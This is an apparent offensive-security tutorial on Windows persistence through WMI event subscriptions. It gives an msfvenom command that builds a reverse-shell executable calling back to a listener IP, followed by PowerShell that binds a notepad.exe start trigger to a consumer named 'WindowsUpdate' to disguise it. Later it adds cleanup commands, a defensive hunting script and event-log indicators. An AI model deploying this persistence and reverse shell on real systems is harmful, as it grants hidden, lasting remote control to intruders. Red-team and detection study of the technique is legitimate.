WMI Event Subscription
Persistence via WMI event subscriptions is a powerful technique that relies on three WMI classes in the root\subscription namespace: EventConsumer, EventFilter and FilterToConsumerBinding (the concrete class names are a consumer class such as CommandLineEventConsumer, __EventFilter and __FilterToConsumerBinding). The objects are stored in the WMI repository, so the subscription survives reboots without any file on disk or autorun registry key, and creating them requires administrator rights.
EventConsumer : defines the action to take. (Ex - run PowerShell)
EventFilter : defines the trigger, as a WQL query, that fires the action. (Ex - every time notepad.exe is started)
FilterToConsumerBinding : links the EventFilter to the EventConsumer
# Generate the reverse-shell executable
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.200.132 LPORT=9999 -f exe -o Reverse.exe
# The consumer below executes C:\update.exe, so the generated payload must be staged at that path on the target (e.g. copy Reverse.exe to C:\update.exe)
# 1. Create the Event Consumer (the command to run when the trigger fires)
$consumer = ([WMIClass]"\\.\root\subscription:CommandLineEventConsumer").CreateInstance()
$consumer.Name = "WindowsUpdate"
$consumer.CommandLineTemplate = "C:\update.exe"
$consumer.ExecutablePath = "C:\update.exe"
$consumer.Put()
# 2. Create the Event Filter (fires when a notepad.exe process starts; WITHIN 3 polls every 3 seconds)
$filter = ([WMIClass]"\\.\root\subscription:__EventFilter").CreateInstance()
$filter.Name = "NotepadStartFilter"
$filter.EventNamespace = "root\cimv2"
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceCreationEvent WITHIN 3 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'notepad.exe'"
$filter.Put()
# 3. Bind the Filter to the Consumer (the subscription is live as soon as this Put() succeeds)
$binding = ([WMIClass]"\\.\root\subscription:__FilterToConsumerBinding").CreateInstance()
$binding.Filter = $filter.Path.RelativePath
$binding.Consumer = $consumer.Path.RelativePath
$binding.Put()
# Removal: delete the binding first, then the filter and consumer it referenced (all three persist independently, so removing only the binding leaves the other two in the repository)
Get-WmiObject -Namespace "root\subscription" -Class "__FilterToConsumerBinding" | Where-Object { $_.Filter -eq '__EventFilter.Name="NotepadStartFilter"' -and $_.Consumer -eq 'CommandLineEventConsumer.Name="WindowsUpdate"' } | Remove-WmiObject
Get-WmiObject -Namespace "root\subscription" -Class "__EventFilter" -Filter "Name='NotepadStartFilter'" | Remove-WmiObject
Get-WmiObject -Namespace "root\subscription" -Class "CommandLineEventConsumer" -Filter "Name='WindowsUpdate'" | Remove-WmiObject
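The steps above create the subscription; the check a defender (or a red teamer verifying cleanup) wants is the reverse: enumerate every binding in root\subscription and resolve it to the filter's WQL query and the consumer's command. The following is an added hunting example, not code from the original page. It assumes an elevated PowerShell session on the host being examined; the empty $allowList is an assumption to be filled with subscription names known to be legitimate in your environment (some management agents install their own).

```powershell
# Added hunting example (not from the original page): enumerate permanent WMI event
# subscriptions in root\subscription and flag consumers that execute commands or scripts.
# Assumes an elevated session; $allowList is a placeholder for known-good consumer names.
$ns = 'root\subscription'

# Consumer classes that run attacker-controlled commands or scripts.
$codeExecConsumers = @('CommandLineEventConsumer', 'ActiveScriptEventConsumer')

# Consumer names known to be legitimate in this environment (assumed; empty by default).
$allowList = @()

# Index filters and consumers by Name so bindings can be resolved without extra queries.
# __EventConsumer is the abstract base class, so this returns every concrete consumer type.
$filters = @{}
Get-CimInstance -Namespace $ns -ClassName __EventFilter | ForEach-Object { $filters[$_.Name] = $_ }
$consumers = @{}
Get-CimInstance -Namespace $ns -ClassName __EventConsumer | ForEach-Object { $consumers[$_.Name] = $_ }

$findings = foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding) {
    # Reference properties come back as partial CimInstances carrying the key (Name);
    # cast to [string] so a dangling reference yields '' rather than a null index.
    $f = $filters[[string]$b.Filter.Name]
    $c = $consumers[[string]$b.Consumer.Name]
    $class = $c.CimClass.CimClassName

    # Reconstruct what the consumer would run, depending on its class.
    $action = switch ($class) {
        'CommandLineEventConsumer'  { "$($c.ExecutablePath) $($c.CommandLineTemplate)".Trim() }
        'ActiveScriptEventConsumer' { if ($c.ScriptText) { $c.ScriptText } else { $c.ScriptFileName } }
        default                     { '(no command execution)' }
    }

    [pscustomobject]@{
        Filter        = $f.Name
        Query         = $f.Query
        Consumer      = $c.Name
        ConsumerClass = $class
        Action        = $action
        # Suspicious: a code-executing consumer that is not on the allow-list, or a
        # binding whose filter or consumer no longer exists (orphaned after partial cleanup).
        Suspicious    = (($codeExecConsumers -contains $class) -and ($allowList -notcontains $c.Name)) -or
                        ($null -eq $f) -or ($null -eq $c)
    }
}

$findings | Sort-Object Suspicious -Descending | Format-List
```

Run against a host where the three Put() calls above have succeeded, this reports the NotepadStartFilter / WindowsUpdate pair with ConsumerClass CommandLineEventConsumer and Action C:\update.exe, marked Suspicious. The same objects also leave log evidence: on Windows 10 / Server 2016 and later, creation of a permanent subscription is recorded as event 5861 in Microsoft-Windows-WMI-Activity/Operational, and Sysmon logs the filter, consumer and binding as events 19, 20 and 21 respectively.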